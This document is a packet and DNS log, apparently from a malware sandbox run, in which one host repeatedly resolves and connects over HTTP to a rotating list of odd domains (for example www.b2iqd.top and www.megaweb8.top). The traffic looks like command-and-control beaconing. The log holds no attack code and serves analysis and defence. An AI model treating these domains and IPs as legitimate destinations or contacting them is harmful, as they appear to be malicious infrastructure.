Nov 4, 2024 04:18:31.279256105 CET	50003	80	192.168.2.6	20.2.208.137
Nov 4, 2024 04:18:31.418281078 CET	80	50003	20.2.208.137	192.168.2.6
Nov 4, 2024 04:18:31.419893980 CET	50003	80	192.168.2.6	20.2.208.137
Nov 4, 2024 04:18:31.787822008 CET	50003	80	192.168.2.6	20.2.208.137
Nov 4, 2024 04:18:32.797861099 CET	50004	80	192.168.2.6	20.2.208.137
Nov 4, 2024 04:18:32.802830935 CET	80	50004	20.2.208.137	192.168.2.6
Nov 4, 2024 04:18:32.802901030 CET	50004	80	192.168.2.6	20.2.208.137
Nov 4, 2024 04:18:32.813199043 CET	50004	80	192.168.2.6	20.2.208.137
Nov 4, 2024 04:18:32.818113089 CET	80	50004	20.2.208.137	192.168.2.6
Nov 4, 2024 04:18:33.763628960 CET	80	50004	20.2.208.137	192.168.2.6
Nov 4, 2024 04:18:33.810486078 CET	50004	80	192.168.2.6	20.2.208.137
Nov 4, 2024 04:18:33.943248987 CET	80	50004	20.2.208.137	192.168.2.6
Nov 4, 2024 04:18:33.945910931 CET	50004	80	192.168.2.6	20.2.208.137
Nov 4, 2024 04:18:34.340440035 CET	50004	80	192.168.2.6	20.2.208.137
Nov 4, 2024 04:18:35.344924927 CET	50005	80	192.168.2.6	20.2.208.137
Nov 4, 2024 04:18:35.350116968 CET	80	50005	20.2.208.137	192.168.2.6
Nov 4, 2024 04:18:35.350214958 CET	50005	80	192.168.2.6	20.2.208.137
Nov 4, 2024 04:18:35.363837957 CET	50005	80	192.168.2.6	20.2.208.137
Nov 4, 2024 04:18:35.368807077 CET	80	50005	20.2.208.137	192.168.2.6
Nov 4, 2024 04:18:35.368829012 CET	80	50005	20.2.208.137	192.168.2.6
Nov 4, 2024 04:18:36.432338953 CET	80	50005	20.2.208.137	192.168.2.6
Nov 4, 2024 04:18:36.486129045 CET	80	50005	20.2.208.137	192.168.2.6
Nov 4, 2024 04:18:36.486179113 CET	50005	80	192.168.2.6	20.2.208.137
Nov 4, 2024 04:18:36.873044014 CET	50005	80	192.168.2.6	20.2.208.137
Nov 4, 2024 04:18:37.891846895 CET	50006	80	192.168.2.6	20.2.208.137
Nov 4, 2024 04:18:37.896804094 CET	80	50006	20.2.208.137	192.168.2.6
Nov 4, 2024 04:18:37.896915913 CET	50006	80	192.168.2.6	20.2.208.137
Nov 4, 2024 04:18:37.903831005 CET	50006	80	192.168.2.6	20.2.208.137
Nov 4, 2024 04:18:37.908652067 CET	80	50006	20.2.208.137	192.168.2.6
Nov 4, 2024 04:18:38.841590881 CET	80	50006	20.2.208.137	192.168.2.6
Nov 4, 2024 04:18:38.888708115 CET	50006	80	192.168.2.6	20.2.208.137
Nov 4, 2024 04:18:39.022131920 CET	80	50006	20.2.208.137	192.168.2.6
Nov 4, 2024 04:18:39.022450924 CET	50006	80	192.168.2.6	20.2.208.137
Nov 4, 2024 04:18:39.023220062 CET	50006	80	192.168.2.6	20.2.208.137
Nov 4, 2024 04:18:39.028211117 CET	80	50006	20.2.208.137	192.168.2.6
Nov 4, 2024 04:18:44.095830917 CET	50007	80	192.168.2.6	13.248.169.48
Nov 4, 2024 04:18:44.100868940 CET	80	50007	13.248.169.48	192.168.2.6
Nov 4, 2024 04:18:44.103928089 CET	50007	80	192.168.2.6	13.248.169.48
Nov 4, 2024 04:18:44.115850925 CET	50007	80	192.168.2.6	13.248.169.48
Nov 4, 2024 04:18:44.120798111 CET	80	50007	13.248.169.48	192.168.2.6
Nov 4, 2024 04:18:44.793931007 CET	80	50007	13.248.169.48	192.168.2.6
Nov 4, 2024 04:18:44.793988943 CET	50007	80	192.168.2.6	13.248.169.48
Nov 4, 2024 04:18:45.623120070 CET	50007	80	192.168.2.6	13.248.169.48
Nov 4, 2024 04:18:45.628191948 CET	80	50007	13.248.169.48	192.168.2.6
Nov 4, 2024 04:18:46.674149990 CET	50008	80	192.168.2.6	13.248.169.48
Nov 4, 2024 04:18:46.679177999 CET	80	50008	13.248.169.48	192.168.2.6
Nov 4, 2024 04:18:46.679244041 CET	50008	80	192.168.2.6	13.248.169.48
Nov 4, 2024 04:18:46.753673077 CET	50008	80	192.168.2.6	13.248.169.48
Nov 4, 2024 04:18:46.758584976 CET	80	50008	13.248.169.48	192.168.2.6
Nov 4, 2024 04:18:47.371635914 CET	80	50008	13.248.169.48	192.168.2.6
Nov 4, 2024 04:18:47.371758938 CET	50008	80	192.168.2.6	13.248.169.48
Nov 4, 2024 04:18:48.279318094 CET	50008	80	192.168.2.6	13.248.169.48
Nov 4, 2024 04:18:48.284282923 CET	80	50008	13.248.169.48	192.168.2.6
Nov 4, 2024 04:18:49.297954082 CET	50009	80	192.168.2.6	13.248.169.48
Nov 4, 2024 04:18:49.302984953 CET	80	50009	13.248.169.48	192.168.2.6
Nov 4, 2024 04:18:49.303114891 CET	50009	80	192.168.2.6	13.248.169.48
Nov 4, 2024 04:18:49.314064980 CET	50009	80	192.168.2.6	13.248.169.48
Nov 4, 2024 04:18:49.319005013 CET	80	50009	13.248.169.48	192.168.2.6
Nov 4, 2024 04:18:49.319024086 CET	80	50009	13.248.169.48	192.168.2.6
Nov 4, 2024 04:18:49.960526943 CET	80	50009	13.248.169.48	192.168.2.6
Nov 4, 2024 04:18:49.961977005 CET	50009	80	192.168.2.6	13.248.169.48
Nov 4, 2024 04:18:50.826236963 CET	50009	80	192.168.2.6	13.248.169.48
Nov 4, 2024 04:18:50.831275940 CET	80	50009	13.248.169.48	192.168.2.6
Nov 4, 2024 04:18:51.845035076 CET	50010	80	192.168.2.6	13.248.169.48
Nov 4, 2024 04:18:51.850140095 CET	80	50010	13.248.169.48	192.168.2.6
Nov 4, 2024 04:18:51.850286007 CET	50010	80	192.168.2.6	13.248.169.48
Nov 4, 2024 04:18:51.863159895 CET	50010	80	192.168.2.6	13.248.169.48
Nov 4, 2024 04:18:51.868316889 CET	80	50010	13.248.169.48	192.168.2.6
Nov 4, 2024 04:18:52.514153004 CET	80	50010	13.248.169.48	192.168.2.6
Nov 4, 2024 04:18:52.547024012 CET	80	50010	13.248.169.48	192.168.2.6
Nov 4, 2024 04:18:52.547136068 CET	50010	80	192.168.2.6	13.248.169.48
Nov 4, 2024 04:18:52.548911095 CET	50010	80	192.168.2.6	13.248.169.48
Nov 4, 2024 04:18:52.553698063 CET	80	50010	13.248.169.48	192.168.2.6
Nov 4, 2024 04:18:57.582072973 CET	50011	80	192.168.2.6	45.33.30.197
Nov 4, 2024 04:18:57.587002039 CET	80	50011	45.33.30.197	192.168.2.6
Nov 4, 2024 04:18:57.587673903 CET	50011	80	192.168.2.6	45.33.30.197
Nov 4, 2024 04:18:57.599123001 CET	50011	80	192.168.2.6	45.33.30.197
Nov 4, 2024 04:18:57.603970051 CET	80	50011	45.33.30.197	192.168.2.6
Nov 4, 2024 04:18:58.184942007 CET	80	50011	45.33.30.197	192.168.2.6
Nov 4, 2024 04:18:58.186337948 CET	80	50011	45.33.30.197	192.168.2.6
Nov 4, 2024 04:18:58.186384916 CET	50011	80	192.168.2.6	45.33.30.197
Nov 4, 2024 04:18:59.107691050 CET	50011	80	192.168.2.6	45.33.30.197
Nov 4, 2024 04:19:00.126214981 CET	50012	80	192.168.2.6	45.33.30.197
Nov 4, 2024 04:19:00.131130934 CET	80	50012	45.33.30.197	192.168.2.6
Nov 4, 2024 04:19:00.134052992 CET	50012	80	192.168.2.6	45.33.30.197
Nov 4, 2024 04:19:00.149600983 CET	50012	80	192.168.2.6	45.33.30.197
Nov 4, 2024 04:19:00.154516935 CET	80	50012	45.33.30.197	192.168.2.6
Nov 4, 2024 04:19:00.730921984 CET	80	50012	45.33.30.197	192.168.2.6
Nov 4, 2024 04:19:00.732428074 CET	80	50012	45.33.30.197	192.168.2.6
Nov 4, 2024 04:19:00.732475042 CET	50012	80	192.168.2.6	45.33.30.197
Nov 4, 2024 04:19:01.654360056 CET	50012	80	192.168.2.6	45.33.30.197
Nov 4, 2024 04:19:02.673718929 CET	50013	80	192.168.2.6	45.33.30.197
Nov 4, 2024 04:19:02.678736925 CET	80	50013	45.33.30.197	192.168.2.6
Nov 4, 2024 04:19:02.678817987 CET	50013	80	192.168.2.6	45.33.30.197
Nov 4, 2024 04:19:02.691003084 CET	50013	80	192.168.2.6	45.33.30.197
Nov 4, 2024 04:19:02.696088076 CET	80	50013	45.33.30.197	192.168.2.6
Nov 4, 2024 04:19:02.696249962 CET	80	50013	45.33.30.197	192.168.2.6
Nov 4, 2024 04:19:03.283235073 CET	80	50013	45.33.30.197	192.168.2.6
Nov 4, 2024 04:19:03.284832001 CET	80	50013	45.33.30.197	192.168.2.6
Nov 4, 2024 04:19:03.291851044 CET	50013	80	192.168.2.6	45.33.30.197
Nov 4, 2024 04:19:04.201165915 CET	50013	80	192.168.2.6	45.33.30.197
Nov 4, 2024 04:19:05.219913960 CET	50014	80	192.168.2.6	45.33.30.197
Nov 4, 2024 04:19:05.225337982 CET	80	50014	45.33.30.197	192.168.2.6
Nov 4, 2024 04:19:05.225426912 CET	50014	80	192.168.2.6	45.33.30.197
Nov 4, 2024 04:19:05.232106924 CET	50014	80	192.168.2.6	45.33.30.197
Nov 4, 2024 04:19:05.236991882 CET	80	50014	45.33.30.197	192.168.2.6
Nov 4, 2024 04:19:05.825795889 CET	80	50014	45.33.30.197	192.168.2.6
Nov 4, 2024 04:19:05.825999975 CET	80	50014	45.33.30.197	192.168.2.6
Nov 4, 2024 04:19:05.827172041 CET	80	50014	45.33.30.197	192.168.2.6
Nov 4, 2024 04:19:05.827343941 CET	50014	80	192.168.2.6	45.33.30.197
Nov 4, 2024 04:19:05.829816103 CET	50014	80	192.168.2.6	45.33.30.197
Nov 4, 2024 04:19:05.834633112 CET	80	50014	45.33.30.197	192.168.2.6
Nov 4, 2024 04:19:10.868150949 CET	50015	80	192.168.2.6	3.33.130.190
Nov 4, 2024 04:19:10.873030901 CET	80	50015	3.33.130.190	192.168.2.6
Nov 4, 2024 04:19:10.873094082 CET	50015	80	192.168.2.6	3.33.130.190
Nov 4, 2024 04:19:10.884768009 CET	50015	80	192.168.2.6	3.33.130.190
Nov 4, 2024 04:19:10.889853954 CET	80	50015	3.33.130.190	192.168.2.6
Nov 4, 2024 04:19:11.577450991 CET	80	50015	3.33.130.190	192.168.2.6
Nov 4, 2024 04:19:11.577545881 CET	50015	80	192.168.2.6	3.33.130.190
Nov 4, 2024 04:19:12.388679981 CET	50015	80	192.168.2.6	3.33.130.190
Nov 4, 2024 04:19:12.393660069 CET	80	50015	3.33.130.190	192.168.2.6
Nov 4, 2024 04:19:13.408356905 CET	50016	80	192.168.2.6	3.33.130.190
Nov 4, 2024 04:19:13.413453102 CET	80	50016	3.33.130.190	192.168.2.6
Nov 4, 2024 04:19:13.414165974 CET	50016	80	192.168.2.6	3.33.130.190
Nov 4, 2024 04:19:13.424403906 CET	50016	80	192.168.2.6	3.33.130.190
Nov 4, 2024 04:19:13.429291964 CET	80	50016	3.33.130.190	192.168.2.6
Nov 4, 2024 04:19:14.935590029 CET	50016	80	192.168.2.6	3.33.130.190
Nov 4, 2024 04:19:14.980612993 CET	80	50016	3.33.130.190	192.168.2.6
Nov 4, 2024 04:19:14.992351055 CET	80	50016	3.33.130.190	192.168.2.6
Nov 4, 2024 04:19:14.992398977 CET	50016	80	192.168.2.6	3.33.130.190
Nov 4, 2024 04:19:15.958214998 CET	50017	80	192.168.2.6	3.33.130.190
Nov 4, 2024 04:19:15.963224888 CET	80	50017	3.33.130.190	192.168.2.6
Nov 4, 2024 04:19:15.963316917 CET	50017	80	192.168.2.6	3.33.130.190
Nov 4, 2024 04:19:15.974008083 CET	50017	80	192.168.2.6	3.33.130.190
Nov 4, 2024 04:19:15.978988886 CET	80	50017	3.33.130.190	192.168.2.6
Nov 4, 2024 04:19:15.979000092 CET	80	50017	3.33.130.190	192.168.2.6
Nov 4, 2024 04:19:17.501975060 CET	50017	80	192.168.2.6	3.33.130.190
Nov 4, 2024 04:19:17.510421038 CET	80	50017	3.33.130.190	192.168.2.6
Nov 4, 2024 04:19:17.510468960 CET	80	50017	3.33.130.190	192.168.2.6
Nov 4, 2024 04:19:17.510479927 CET	80	50017	3.33.130.190	192.168.2.6
Nov 4, 2024 04:19:17.510488033 CET	80	50017	3.33.130.190	192.168.2.6
Nov 4, 2024 04:19:17.510554075 CET	50017	80	192.168.2.6	3.33.130.190
Nov 4, 2024 04:19:17.510554075 CET	50017	80	192.168.2.6	3.33.130.190
Nov 4, 2024 04:19:17.510932922 CET	80	50017	3.33.130.190	192.168.2.6
Nov 4, 2024 04:19:17.510967016 CET	50017	80	192.168.2.6	3.33.130.190
Nov 4, 2024 04:19:18.517225981 CET	50018	80	192.168.2.6	3.33.130.190
Nov 4, 2024 04:19:18.522267103 CET	80	50018	3.33.130.190	192.168.2.6
Nov 4, 2024 04:19:18.522396088 CET	50018	80	192.168.2.6	3.33.130.190
Nov 4, 2024 04:19:18.530431032 CET	50018	80	192.168.2.6	3.33.130.190
Nov 4, 2024 04:19:18.535265923 CET	80	50018	3.33.130.190	192.168.2.6
Nov 4, 2024 04:19:19.152743101 CET	80	50018	3.33.130.190	192.168.2.6
Nov 4, 2024 04:19:19.153258085 CET	80	50018	3.33.130.190	192.168.2.6
Nov 4, 2024 04:19:19.153430939 CET	50018	80	192.168.2.6	3.33.130.190
Nov 4, 2024 04:19:19.155567884 CET	50018	80	192.168.2.6	3.33.130.190
Nov 4, 2024 04:19:19.160557032 CET	80	50018	3.33.130.190	192.168.2.6
Nov 4, 2024 04:19:24.189165115 CET	50019	80	192.168.2.6	172.67.206.245
Nov 4, 2024 04:19:24.194014072 CET	80	50019	172.67.206.245	192.168.2.6
Nov 4, 2024 04:19:24.194257021 CET	50019	80	192.168.2.6	172.67.206.245
Nov 4, 2024 04:19:24.204212904 CET	50019	80	192.168.2.6	172.67.206.245
Nov 4, 2024 04:19:24.209042072 CET	80	50019	172.67.206.245	192.168.2.6
Nov 4, 2024 04:19:25.279614925 CET	80	50019	172.67.206.245	192.168.2.6
Nov 4, 2024 04:19:25.282011986 CET	80	50019	172.67.206.245	192.168.2.6
Nov 4, 2024 04:19:25.283977985 CET	50019	80	192.168.2.6	172.67.206.245
Nov 4, 2024 04:19:25.716833115 CET	50019	80	192.168.2.6	172.67.206.245
Nov 4, 2024 04:19:26.736157894 CET	50020	80	192.168.2.6	172.67.206.245
Nov 4, 2024 04:19:26.741908073 CET	80	50020	172.67.206.245	192.168.2.6
Nov 4, 2024 04:19:26.741981030 CET	50020	80	192.168.2.6	172.67.206.245
Nov 4, 2024 04:19:26.754543066 CET	50020	80	192.168.2.6	172.67.206.245
Nov 4, 2024 04:19:26.759289026 CET	80	50020	172.67.206.245	192.168.2.6
Nov 4, 2024 04:19:27.799388885 CET	80	50020	172.67.206.245	192.168.2.6
Nov 4, 2024 04:19:27.801208019 CET	80	50020	172.67.206.245	192.168.2.6
Nov 4, 2024 04:19:27.801274061 CET	50020	80	192.168.2.6	172.67.206.245
Nov 4, 2024 04:19:28.263703108 CET	50020	80	192.168.2.6	172.67.206.245
Nov 4, 2024 04:19:29.282299995 CET	50021	80	192.168.2.6	172.67.206.245
Nov 4, 2024 04:19:29.287261963 CET	80	50021	172.67.206.245	192.168.2.6
Nov 4, 2024 04:19:29.289988995 CET	50021	80	192.168.2.6	172.67.206.245
Nov 4, 2024 04:19:29.302269936 CET	50021	80	192.168.2.6	172.67.206.245
Nov 4, 2024 04:19:29.307168961 CET	80	50021	172.67.206.245	192.168.2.6
Nov 4, 2024 04:19:29.307228088 CET	80	50021	172.67.206.245	192.168.2.6
Nov 4, 2024 04:19:30.356318951 CET	80	50021	172.67.206.245	192.168.2.6
Nov 4, 2024 04:19:30.358156919 CET	80	50021	172.67.206.245	192.168.2.6
Nov 4, 2024 04:19:30.358212948 CET	50021	80	192.168.2.6	172.67.206.245
Nov 4, 2024 04:19:30.810666084 CET	50021	80	192.168.2.6	172.67.206.245
Nov 4, 2024 04:19:31.830882072 CET	50022	80	192.168.2.6	172.67.206.245
Nov 4, 2024 04:19:31.838738918 CET	80	50022	172.67.206.245	192.168.2.6
Nov 4, 2024 04:19:31.839960098 CET	50022	80	192.168.2.6	172.67.206.245
Nov 4, 2024 04:19:31.851869106 CET	50022	80	192.168.2.6	172.67.206.245
Nov 4, 2024 04:19:31.858911991 CET	80	50022	172.67.206.245	192.168.2.6
Nov 4, 2024 04:19:32.854149103 CET	80	50022	172.67.206.245	192.168.2.6
Nov 4, 2024 04:19:32.856350899 CET	80	50022	172.67.206.245	192.168.2.6
Nov 4, 2024 04:19:32.856410027 CET	50022	80	192.168.2.6	172.67.206.245
Nov 4, 2024 04:19:32.858026028 CET	50022	80	192.168.2.6	172.67.206.245
Nov 4, 2024 04:19:32.862787008 CET	80	50022	172.67.206.245	192.168.2.6
Nov 4, 2024 04:19:38.062294960 CET	50023	80	192.168.2.6	104.21.59.91
Nov 4, 2024 04:19:38.067146063 CET	80	50023	104.21.59.91	192.168.2.6
Nov 4, 2024 04:19:38.071933031 CET	50023	80	192.168.2.6	104.21.59.91
Nov 4, 2024 04:19:38.083873987 CET	50023	80	192.168.2.6	104.21.59.91
Nov 4, 2024 04:19:38.088728905 CET	80	50023	104.21.59.91	192.168.2.6
Nov 4, 2024 04:19:38.975714922 CET	80	50023	104.21.59.91	192.168.2.6
Nov 4, 2024 04:19:38.977405071 CET	80	50023	104.21.59.91	192.168.2.6
Nov 4, 2024 04:19:38.977456093 CET	50023	80	192.168.2.6	104.21.59.91
Nov 4, 2024 04:19:39.594476938 CET	50023	80	192.168.2.6	104.21.59.91
Nov 4, 2024 04:19:40.611001968 CET	50024	80	192.168.2.6	104.21.59.91
Nov 4, 2024 04:19:40.616003990 CET	80	50024	104.21.59.91	192.168.2.6
Nov 4, 2024 04:19:40.616076946 CET	50024	80	192.168.2.6	104.21.59.91
Nov 4, 2024 04:19:40.627063036 CET	50024	80	192.168.2.6	104.21.59.91
Nov 4, 2024 04:19:40.631958008 CET	80	50024	104.21.59.91	192.168.2.6
Nov 4, 2024 04:19:41.498133898 CET	80	50024	104.21.59.91	192.168.2.6
Nov 4, 2024 04:19:41.501601934 CET	80	50024	104.21.59.91	192.168.2.6
Nov 4, 2024 04:19:41.501714945 CET	50024	80	192.168.2.6	104.21.59.91
Nov 4, 2024 04:19:42.181878090 CET	50024	80	192.168.2.6	104.21.59.91
Nov 4, 2024 04:19:43.188553095 CET	50025	80	192.168.2.6	104.21.59.91
Nov 4, 2024 04:19:43.193450928 CET	80	50025	104.21.59.91	192.168.2.6
Nov 4, 2024 04:19:43.193572044 CET	50025	80	192.168.2.6	104.21.59.91
Nov 4, 2024 04:19:43.203685045 CET	50025	80	192.168.2.6	104.21.59.91
Nov 4, 2024 04:19:43.208667040 CET	80	50025	104.21.59.91	192.168.2.6
Nov 4, 2024 04:19:43.208678961 CET	80	50025	104.21.59.91	192.168.2.6
Nov 4, 2024 04:19:44.073548079 CET	80	50025	104.21.59.91	192.168.2.6
Nov 4, 2024 04:19:44.073875904 CET	80	50025	104.21.59.91	192.168.2.6
Nov 4, 2024 04:19:44.074048042 CET	50025	80	192.168.2.6	104.21.59.91
Nov 4, 2024 04:19:44.076256037 CET	80	50025	104.21.59.91	192.168.2.6
Nov 4, 2024 04:19:44.076323986 CET	50025	80	192.168.2.6	104.21.59.91
Nov 4, 2024 04:19:44.716974974 CET	50025	80	192.168.2.6	104.21.59.91
Nov 4, 2024 04:19:45.738234043 CET	50027	80	192.168.2.6	104.21.59.91
Nov 4, 2024 04:19:45.743283987 CET	80	50027	104.21.59.91	192.168.2.6
Nov 4, 2024 04:19:45.743403912 CET	50027	80	192.168.2.6	104.21.59.91
Nov 4, 2024 04:19:45.750484943 CET	50027	80	192.168.2.6	104.21.59.91
Nov 4, 2024 04:19:45.755750895 CET	80	50027	104.21.59.91	192.168.2.6
Nov 4, 2024 04:19:46.623642921 CET	80	50027	104.21.59.91	192.168.2.6
Nov 4, 2024 04:19:46.626393080 CET	80	50027	104.21.59.91	192.168.2.6
Nov 4, 2024 04:19:46.626466036 CET	50027	80	192.168.2.6	104.21.59.91
Nov 4, 2024 04:19:46.627383947 CET	50027	80	192.168.2.6	104.21.59.91
Nov 4, 2024 04:19:46.632153988 CET	80	50027	104.21.59.91	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 4, 2024 04:17:16.821834087 CET	57389	53	192.168.2.6	1.1.1.1
Nov 4, 2024 04:17:17.316773891 CET	53	57389	1.1.1.1	192.168.2.6
Nov 4, 2024 04:17:33.736157894 CET	59666	53	192.168.2.6	1.1.1.1
Nov 4, 2024 04:17:33.764516115 CET	53	59666	1.1.1.1	192.168.2.6
Nov 4, 2024 04:17:47.212063074 CET	64374	53	192.168.2.6	1.1.1.1
Nov 4, 2024 04:17:47.233527899 CET	53	64374	1.1.1.1	192.168.2.6
Nov 4, 2024 04:18:00.673691034 CET	50690	53	192.168.2.6	1.1.1.1
Nov 4, 2024 04:18:00.833690882 CET	53	50690	1.1.1.1	192.168.2.6
Nov 4, 2024 04:18:14.267843008 CET	57591	53	192.168.2.6	1.1.1.1
Nov 4, 2024 04:18:14.380697966 CET	53	57591	1.1.1.1	192.168.2.6
Nov 4, 2024 04:18:28.220747948 CET	62601	53	192.168.2.6	1.1.1.1
Nov 4, 2024 04:18:29.217206955 CET	62601	53	192.168.2.6	1.1.1.1
Nov 4, 2024 04:18:30.232456923 CET	62601	53	192.168.2.6	1.1.1.1
Nov 4, 2024 04:18:30.243515015 CET	53	62601	1.1.1.1	192.168.2.6
Nov 4, 2024 04:18:30.243529081 CET	53	62601	1.1.1.1	192.168.2.6
Nov 4, 2024 04:18:30.243537903 CET	53	62601	1.1.1.1	192.168.2.6
Nov 4, 2024 04:18:44.035836935 CET	58222	53	192.168.2.6	1.1.1.1
Nov 4, 2024 04:18:44.091181993 CET	53	58222	1.1.1.1	192.168.2.6
Nov 4, 2024 04:18:57.564151049 CET	50451	53	192.168.2.6	1.1.1.1
Nov 4, 2024 04:18:57.579720974 CET	53	50451	1.1.1.1	192.168.2.6
Nov 4, 2024 04:19:10.853348970 CET	58084	53	192.168.2.6	1.1.1.1
Nov 4, 2024 04:19:10.865350008 CET	53	58084	1.1.1.1	192.168.2.6
Nov 4, 2024 04:19:24.173897982 CET	59222	53	192.168.2.6	1.1.1.1
Nov 4, 2024 04:19:24.186522007 CET	53	59222	1.1.1.1	192.168.2.6
Nov 4, 2024 04:19:37.876504898 CET	58333	53	192.168.2.6	1.1.1.1
Nov 4, 2024 04:19:38.055056095 CET	53	58333	1.1.1.1	192.168.2.6
Nov 4, 2024 04:19:52.235805988 CET	58005	53	192.168.2.6	1.1.1.1
Nov 4, 2024 04:19:52.262491941 CET	53	58005	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 4, 2024 04:17:16.821834087 CET	192.168.2.6	1.1.1.1	0xc2b3	Standard query (0)	www.39978.club	A (IP address)	IN (0x0001)	false
Nov 4, 2024 04:17:33.736157894 CET	192.168.2.6	1.1.1.1	0x9a90	Standard query (0)	www.vnxoso88.art	A (IP address)	IN (0x0001)	false
Nov 4, 2024 04:17:47.212063074 CET	192.168.2.6	1.1.1.1	0xbadc	Standard query (0)	www.rtpakuratkribo.xyz	A (IP address)	IN (0x0001)	false
Nov 4, 2024 04:18:00.673691034 CET	192.168.2.6	1.1.1.1	0x59b9	Standard query (0)	www.pluribiz.life	A (IP address)	IN (0x0001)	false
Nov 4, 2024 04:18:14.267843008 CET	192.168.2.6	1.1.1.1	0xb5bd	Standard query (0)	www.idaschem.xyz	A (IP address)	IN (0x0001)	false
Nov 4, 2024 04:18:28.220747948 CET	192.168.2.6	1.1.1.1	0x109	Standard query (0)	www.b2iqd.top	A (IP address)	IN (0x0001)	false
Nov 4, 2024 04:18:29.217206955 CET	192.168.2.6	1.1.1.1	0x109	Standard query (0)	www.b2iqd.top	A (IP address)	IN (0x0001)	false
Nov 4, 2024 04:18:30.232456923 CET	192.168.2.6	1.1.1.1	0x109	Standard query (0)	www.b2iqd.top	A (IP address)	IN (0x0001)	false
Nov 4, 2024 04:18:44.035836935 CET	192.168.2.6	1.1.1.1	0x9dd8	Standard query (0)	www.ipk.app	A (IP address)	IN (0x0001)	false
Nov 4, 2024 04:18:57.564151049 CET	192.168.2.6	1.1.1.1	0xebae	Standard query (0)	www.jigg.space	A (IP address)	IN (0x0001)	false
Nov 4, 2024 04:19:10.853348970 CET	192.168.2.6	1.1.1.1	0x89ab	Standard query (0)	www.dccf.earth	A (IP address)	IN (0x0001)	false
Nov 4, 2024 04:19:24.173897982 CET	192.168.2.6	1.1.1.1	0x201b	Standard query (0)	www.gamebaitopzo.fun	A (IP address)	IN (0x0001)	false
Nov 4, 2024 04:19:37.876504898 CET	192.168.2.6	1.1.1.1	0x537e	Standard query (0)	www.megaweb8.top	A (IP address)	IN (0x0001)	false
Nov 4, 2024 04:19:52.235805988 CET	192.168.2.6	1.1.1.1	0xb195	Standard query (0)	www.wethebeststore.online	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 4, 2024 04:17:17.316773891 CET	1.1.1.1	192.168.2.6	0xc2b3	No error (0)	www.39978.club	uaslkd.skasdhu.huhusddfnsuegcdn.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 04:17:17.316773891 CET	1.1.1.1	192.168.2.6	0xc2b3	No error (0)	uaslkd.skasdhu.huhusddfnsuegcdn.com	gtml.huksa.huhusddfnsuegcdn.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 04:17:17.316773891 CET	1.1.1.1	192.168.2.6	0xc2b3	No error (0)	gtml.huksa.huhusddfnsuegcdn.com		206.119.185.225	A (IP address)	IN (0x0001)	false
Nov 4, 2024 04:17:17.316773891 CET	1.1.1.1	192.168.2.6	0xc2b3	No error (0)	gtml.huksa.huhusddfnsuegcdn.com		206.119.185.224	A (IP address)	IN (0x0001)	false
Nov 4, 2024 04:17:17.316773891 CET	1.1.1.1	192.168.2.6	0xc2b3	No error (0)	gtml.huksa.huhusddfnsuegcdn.com		206.119.185.227	A (IP address)	IN (0x0001)	false
Nov 4, 2024 04:17:17.316773891 CET	1.1.1.1	192.168.2.6	0xc2b3	No error (0)	gtml.huksa.huhusddfnsuegcdn.com		206.119.185.226	A (IP address)	IN (0x0001)	false
Nov 4, 2024 04:17:17.316773891 CET	1.1.1.1	192.168.2.6	0xc2b3	No error (0)	gtml.huksa.huhusddfnsuegcdn.com		206.119.185.223	A (IP address)	IN (0x0001)	false
Nov 4, 2024 04:17:33.764516115 CET	1.1.1.1	192.168.2.6	0x9a90	No error (0)	www.vnxoso88.art	vnxoso88.art		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 04:17:33.764516115 CET	1.1.1.1	192.168.2.6	0x9a90	No error (0)	vnxoso88.art		66.29.146.14	A (IP address)	IN (0x0001)	false
Nov 4, 2024 04:17:47.233527899 CET	1.1.1.1	192.168.2.6	0xbadc	No error (0)	www.rtpakuratkribo.xyz	rtpakuratkribo.xyz		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 04:17:47.233527899 CET	1.1.1.1	192.168.2.6	0xbadc	No error (0)	rtpakuratkribo.xyz		66.29.146.173	A (IP address)	IN (0x0001)	false
Nov 4, 2024 04:18:00.833690882 CET	1.1.1.1	192.168.2.6	0x59b9	No error (0)	www.pluribiz.life		209.74.64.58	A (IP address)	IN (0x0001)	false
Nov 4, 2024 04:18:14.380697966 CET	1.1.1.1	192.168.2.6	0xb5bd	No error (0)	www.idaschem.xyz	redirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 04:18:14.380697966 CET	1.1.1.1	192.168.2.6	0xb5bd	No error (0)	redirect.natrocdn.com	natroredirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 04:18:14.380697966 CET	1.1.1.1	192.168.2.6	0xb5bd	No error (0)	natroredirect.natrocdn.com		85.159.66.93	A (IP address)	IN (0x0001)	false
Nov 4, 2024 04:18:30.243515015 CET	1.1.1.1	192.168.2.6	0x109	No error (0)	www.b2iqd.top		20.2.208.137	A (IP address)	IN (0x0001)	false
Nov 4, 2024 04:18:30.243529081 CET	1.1.1.1	192.168.2.6	0x109	No error (0)	www.b2iqd.top		20.2.208.137	A (IP address)	IN (0x0001)	false
Nov 4, 2024 04:18:30.243537903 CET	1.1.1.1	192.168.2.6	0x109	No error (0)	www.b2iqd.top		20.2.208.137	A (IP address)	IN (0x0001)	false
Nov 4, 2024 04:18:44.091181993 CET	1.1.1.1	192.168.2.6	0x9dd8	No error (0)	www.ipk.app		13.248.169.48	A (IP address)	IN (0x0001)	false
Nov 4, 2024 04:18:44.091181993 CET	1.1.1.1	192.168.2.6	0x9dd8	No error (0)	www.ipk.app		76.223.54.146	A (IP address)	IN (0x0001)	false
Nov 4, 2024 04:18:57.579720974 CET	1.1.1.1	192.168.2.6	0xebae	No error (0)	www.jigg.space		45.33.30.197	A (IP address)	IN (0x0001)	false
Nov 4, 2024 04:18:57.579720974 CET	1.1.1.1	192.168.2.6	0xebae	No error (0)	www.jigg.space		45.33.20.235	A (IP address)	IN (0x0001)	false
Nov 4, 2024 04:18:57.579720974 CET	1.1.1.1	192.168.2.6	0xebae	No error (0)	www.jigg.space		45.33.23.183	A (IP address)	IN (0x0001)	false
